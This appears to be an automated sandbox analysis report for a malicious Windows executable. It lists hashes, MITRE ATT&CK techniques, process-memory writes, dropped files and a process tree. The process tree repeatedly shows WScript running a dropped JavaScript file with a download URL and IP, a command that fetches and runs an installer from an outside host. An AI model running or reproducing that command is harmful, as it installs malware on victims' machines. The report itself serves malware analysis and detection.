dd93a13a175add9e4551a1fe6e8efb3d8ccd373069727d56d7f4fe49a22a032f

Analysis

max time kernel
119s
max time network
120s
platform
windows7_x64
resource
win7-20240508-en
resource tags

arch:x64arch:x86image:win7-20240508-enlocale:en-usos:windows7-x64system
submitted
25-05-2024 00:01

Sharing

Copy URL

Twitter E-mail

Report Analysis Logs

General

Target

70397cdb5b9bbba5634e3bf6e4f63665_JaffaCakes118.exe
Size

184KB
MD5

70397cdb5b9bbba5634e3bf6e4f63665
SHA1

237c6c53e41368b7f5909cdda054f41e3b717693
SHA256

dd93a13a175add9e4551a1fe6e8efb3d8ccd373069727d56d7f4fe49a22a032f
SHA512

6e4015856adce95cc32e39732cc2499deffdc5594ebe1dc62960f2cda54e00c00ab1112b5f1eedf11ad64e7b646d4efa46add7293a3ce6d6a5136a1f5aca690c
SSDEEP

3072:/MzsU0S0w8Hp9Rc/LB+dJGESR4hIRSYaVvb1NVFJNndnO3G:/7BSH8zUB+nGESaaRvoB7FJNndnP

Score

8^/10

execution

Malware Config

Signatures

Blocklisted process makes network request 11 IoCs

flow	pid	Process
6	2260	WScript.exe
8	2260	WScript.exe
10	2260	WScript.exe
12	2664	WScript.exe
13	2664	WScript.exe
15	2824	WScript.exe
16	2824	WScript.exe
18	1996	WScript.exe
19	1996	WScript.exe
21	1564	WScript.exe
22	1564	WScript.exe

Command and Scripting Interpreter: JavaScript 1 TTPs
execution

JavaScript
T1059.007
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).

System Information Discovery
T1082

Suspicious use of WriteProcessMemory 20 IoCs

description	pid	Process	procid_target
PID 2148 wrote to memory of 2260	2148	70397cdb5b9bbba5634e3bf6e4f63665_JaffaCakes118.exe	28
PID 2148 wrote to memory of 2260	2148	70397cdb5b9bbba5634e3bf6e4f63665_JaffaCakes118.exe	28
PID 2148 wrote to memory of 2260	2148	70397cdb5b9bbba5634e3bf6e4f63665_JaffaCakes118.exe	28
PID 2148 wrote to memory of 2260	2148	70397cdb5b9bbba5634e3bf6e4f63665_JaffaCakes118.exe	28
PID 2148 wrote to memory of 2664	2148	70397cdb5b9bbba5634e3bf6e4f63665_JaffaCakes118.exe	30
PID 2148 wrote to memory of 2664	2148	70397cdb5b9bbba5634e3bf6e4f63665_JaffaCakes118.exe	30
PID 2148 wrote to memory of 2664	2148	70397cdb5b9bbba5634e3bf6e4f63665_JaffaCakes118.exe	30
PID 2148 wrote to memory of 2664	2148	70397cdb5b9bbba5634e3bf6e4f63665_JaffaCakes118.exe	30
PID 2148 wrote to memory of 2824	2148	70397cdb5b9bbba5634e3bf6e4f63665_JaffaCakes118.exe	32
PID 2148 wrote to memory of 2824	2148	70397cdb5b9bbba5634e3bf6e4f63665_JaffaCakes118.exe	32
PID 2148 wrote to memory of 2824	2148	70397cdb5b9bbba5634e3bf6e4f63665_JaffaCakes118.exe	32
PID 2148 wrote to memory of 2824	2148	70397cdb5b9bbba5634e3bf6e4f63665_JaffaCakes118.exe	32
PID 2148 wrote to memory of 1996	2148	70397cdb5b9bbba5634e3bf6e4f63665_JaffaCakes118.exe	34
PID 2148 wrote to memory of 1996	2148	70397cdb5b9bbba5634e3bf6e4f63665_JaffaCakes118.exe	34
PID 2148 wrote to memory of 1996	2148	70397cdb5b9bbba5634e3bf6e4f63665_JaffaCakes118.exe	34
PID 2148 wrote to memory of 1996	2148	70397cdb5b9bbba5634e3bf6e4f63665_JaffaCakes118.exe	34
PID 2148 wrote to memory of 1564	2148	70397cdb5b9bbba5634e3bf6e4f63665_JaffaCakes118.exe	36
PID 2148 wrote to memory of 1564	2148	70397cdb5b9bbba5634e3bf6e4f63665_JaffaCakes118.exe	36
PID 2148 wrote to memory of 1564	2148	70397cdb5b9bbba5634e3bf6e4f63665_JaffaCakes118.exe	36
PID 2148 wrote to memory of 1564	2148	70397cdb5b9bbba5634e3bf6e4f63665_JaffaCakes118.exe	36

C:\Users\Admin\AppData\Local\Temp\70397cdb5b9bbba5634e3bf6e4f63665_JaffaCakes118.exe
"C:\Users\Admin\AppData\Local\Temp\70397cdb5b9bbba5634e3bf6e4f63665_JaffaCakes118.exe"
1⤵
- Suspicious use of WriteProcessMemory
PID:2148
- C:\Windows\SysWOW64\WScript.exe
  "C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\fufDD6.js" http://www.djapp.info/?domain=ajBpDWSEPi.com&dotnet=4&file=installer&ip=52.1.45.42:80&pub_id=101&setup_id=300 C:\Users\Admin\AppData\Local\Temp\fufDD6.exe
  2⤵
  - Blocklisted process makes network request
  PID:2260
- C:\Windows\SysWOW64\WScript.exe
  "C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\fufDD6.js" http://www.djapp.info/?domain=ajBpDWSEPi.com&dotnet=4&file=installer&ip=52.1.45.42:80&pub_id=101&setup_id=300 C:\Users\Admin\AppData\Local\Temp\fufDD6.exe
  2⤵
  - Blocklisted process makes network request
  PID:2664
- C:\Windows\SysWOW64\WScript.exe
  "C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\fufDD6.js" http://www.djapp.info/?domain=ajBpDWSEPi.com&dotnet=4&file=installer&ip=52.1.45.42:80&pub_id=101&setup_id=300 C:\Users\Admin\AppData\Local\Temp\fufDD6.exe
  2⤵
  - Blocklisted process makes network request
  PID:2824
- C:\Windows\SysWOW64\WScript.exe
  "C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\fufDD6.js" http://www.djapp.info/?domain=ajBpDWSEPi.com&dotnet=4&file=installer&ip=52.1.45.42:80&pub_id=101&setup_id=300 C:\Users\Admin\AppData\Local\Temp\fufDD6.exe
  2⤵
  - Blocklisted process makes network request
  PID:1996
- C:\Windows\SysWOW64\WScript.exe
  "C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\fufDD6.js" http://www.djapp.info/?domain=ajBpDWSEPi.com&dotnet=4&file=installer&ip=52.1.45.42:80&pub_id=101&setup_id=300 C:\Users\Admin\AppData\Local\Temp\fufDD6.exe
  2⤵
  - Blocklisted process makes network request
  PID:1564

Network

MITRE ATT&CK Enterprise v15

Reconnaissance

Resource Development

Initial Access

Execution

Command and Scripting Interpreter

T1059

JavaScript

T1059.007

Persistence

Privilege Escalation

Defense Evasion

Credential Access

Discovery

System Information Discovery

T1082

Lateral Movement

Collection

Command and Control

Exfiltration

Impact

Replay Monitor

Loading Replay Monitor...

Downloads

C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\24BD96D5497F70B3F510A6B53CD43F3E_3A89246FB90C5EE6620004F1AE0EB0EA

Filesize
1KB

MD5
3bfb237d95f9c34465d50360f39b3ceb

SHA1
2cdee845ea6ebbd3cd0466b0eae4752842de86cc

SHA256
2ceaddb29268e6112e7aa95722894fb061238ad4e2b247ce23595609daa5eb8d

SHA512
da55bf0fd898acda5dfd2366a96d439807e502c763dca35c3a119c3ab45f6e3d821a1e3fd29858e333606ef0e822f3373b9cb8c41d95736131bb001ad5b6a16f

Download Submit
C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\CAF4703619713E3F18D8A9D5D88D6288_F2DAF19C1F776537105D08FC8D978464

Filesize
724B

MD5
8202a1cd02e7d69597995cabbe881a12

SHA1
8858d9d934b7aa9330ee73de6c476acf19929ff6

SHA256
58f381c3a0a0ace6321da22e40bd44a597bd98b9c9390ab9258426b5cf75a7a5

SHA512
97ba9fceab995d4bef706f8deef99e06862999734ebe6a05832c710104479c6337cbf0a76e1c1e0f91566a61334dc100d837dfd049e20da765fe49def684f9c9

Download Submit
C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\24BD96D5497F70B3F510A6B53CD43F3E_3A89246FB90C5EE6620004F1AE0EB0EA

Filesize
410B

MD5
c958012d86408208dc043f0c3189016c

SHA1
733ad98b82f1007a5bda9389f83e3cdb44d38f36

SHA256
9251c1326b86ecd64bb7f3b715f4bc3127d76c2a2afc9e48dc95b9ce995e345f

SHA512
72dbd272c683a4c914022556cb0ab4e2e449cf0a596c05f47ca6f4bc792c3e6979594c9f8f697ce7c274db9122aa0817fbe2c5649935c03b0b422a79676b770a

Download Submit
C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\94308059B57B3142E455B38A6EB92015

Filesize
344B

MD5
f90755a30f39e86cbba7af84aa67f56e

SHA1
0b325892760aa175ccefa4f1ba69e11dadfa906e

SHA256
e010045d822380a20bd2bff9bd101f0cdea3efb27405a56848f1fa5e329e69c3

SHA512
87a77a6d569053a06a7b3e898769e88cb65af557788c56ae40db9b746188c7622adcaba3b2bd44b9f0a94c3fa7a69b7f3f023283c289d618be9353256a7475f4

Download Submit
C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\CAF4703619713E3F18D8A9D5D88D6288_F2DAF19C1F776537105D08FC8D978464

Filesize
392B

MD5
46b8377b720382bcf4a24c2bc631006e

SHA1
b1eec4168474a6a076cc295a227feaa59c21a711

SHA256
04894c3d34c96268b7bc7d46b7f2aa5ed4747d2f200168422295775bbd24c34c

SHA512
d242b50ddc96830f808946c37bb9a4f42c78d97d97222684830518fdbb67ea6578792a8f93396d75e420b3a721c31c1c5f2bb618065367a0cf359b287778562f

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\MNCIS1YI\domain_profile[1].htm

Filesize
6KB

MD5
321b6507b053f03f68e914d2a86c2ed3

SHA1
88ccff379a084d045060ed0891ad34a64f759017

SHA256
49a3deba8fd5a08757bd6954ef835d4d18bc558beadda66c7e259ccd8a8bc5bb

SHA512
29e3aec8316c68c9bf830a4a8c3c1ef412121893f5fc320f5e35133db9211ff836d1d83eb40e26a7e0af9786fd4d4e07fbe8e6f27842fcf4c0b28d4317e34682

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\MNCIS1YI\domain_profile[1].htm

Filesize
40KB

MD5
cd2c4fbe5c8bd0800246b614766bfe87

SHA1
8ee07007a4ac841cae6280ac233b65742a7148b4

SHA256
76b6441abf99293cd7e68261b69b0d11e8c72e22d3cbd4495a6ba7ce6a1e6a0e

SHA512
cf05a701abb130a2b25ee6a96b7788ce64fe1d1834a7080487d3683d3313383a9a0ddf38ab3875bbcec9155818bcd4873e4c9a26eabdc2cc455875c5b5eae6f5

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\TTL9DZJ3\domain_profile[1].htm

Filesize
40KB

MD5
97df6900e3e992f4f5795c0b18ca283e

SHA1
ef9aa074ccf5545bdf8505af14779b567cb8351e

SHA256
fd09af64d49a2a26cd06aee4f9f8c8455d9d7e8ec0d1b65263eb2fffada6251a

SHA512
b34c86be37a3cce117d4bb1615e92ae71c1a85bbe7e7ab111a56f8a2440330b9fdd3b4e35fb957165499206c158d6e8b547a2a88f822179d58d8d48c0a671629

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\TTL9DZJ3\domain_profile[1].htm

Filesize
6KB

MD5
81cf2cdd740b4702359d214fba79009d

SHA1
9db606df6e55bd32e97ba19e9395371768cbadb6

SHA256
f051c8b80212f7a7d50609f348199a88996431a732e64a4954000425c68725fb

SHA512
f7b399f3b09ac05becb783fe6a34b6494853e69f3689d9e508ae5ef70862a2b62f81205ac2335103bd85da2cf3b3c519d26e08e30eeeb21c23ca7b489df00605

Download Submit
C:\Users\Admin\AppData\Local\Temp\Cab3D00.tmp

Filesize
68KB

MD5
29f65ba8e88c063813cc50a4ea544e93

SHA1
05a7040d5c127e68c25d81cc51271ffb8bef3568

SHA256
1ed81fa8dfb6999a9fedc6e779138ffd99568992e22d300acd181a6d2c8de184

SHA512
e29b2e92c496245bed3372578074407e8ef8882906ce10c35b3c8deebfefe01b5fd7f3030acaa693e175f4b7aca6cd7d8d10ae1c731b09c5fa19035e005de3aa

Download Submit
C:\Users\Admin\AppData\Local\Temp\Tar5561.tmp

Filesize
177KB

MD5
435a9ac180383f9fa094131b173a2f7b

SHA1
76944ea657a9db94f9a4bef38f88c46ed4166983

SHA256
67dc37ed50b8e63272b49a254a6039ee225974f1d767bb83eb1fd80e759a7c34

SHA512
1a6b277611959720a9c71114957620517ad94541302f164eb872bd322292a952409bafb8bc2ac793b16ad5f25d83f8594ccff2b7834e3c2b2b941e6fc84c009a

Download Submit
C:\Users\Admin\AppData\Local\Temp\fufDD6.js

Filesize
3KB

MD5
3813cab188d1de6f92f8b82c2059991b

SHA1
4807cc6ea087a788e6bb8ebdf63c9d2a859aa4cb

SHA256
a3c5baef033d6a5ab2babddcfc70fffe5cfbcef04f9a57f60ddf21a2ea0a876e

SHA512
83b0c0ed660b29d1b99111e8a3f37cc1d2e7bada86a2a10ecaacb81b43fad2ec94da6707a26e5ae94d3ce48aa8fc766439df09a6619418f98a215b9d9a6e4d76

Download Submit
C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Cookies\AKH8B1E9.txt

Filesize
177B

MD5
d11c3acc82cf8b1e33c80281350892d0

SHA1
76b708bd803f8ba23a4d4abf8c9a02a76570b58c

SHA256
ba04f9fbc13cd6d45babf6a35cabb6965470bcb15e3de7c1bccbce1735dde29b

SHA512
9b8c3c63518654810361a5fc69888ab2f3820b14388a4b81cff3a1af655cc0c2fc776d2927e203e62977a9dc923f925c40a9771293742d57738118a970519992

Download Submit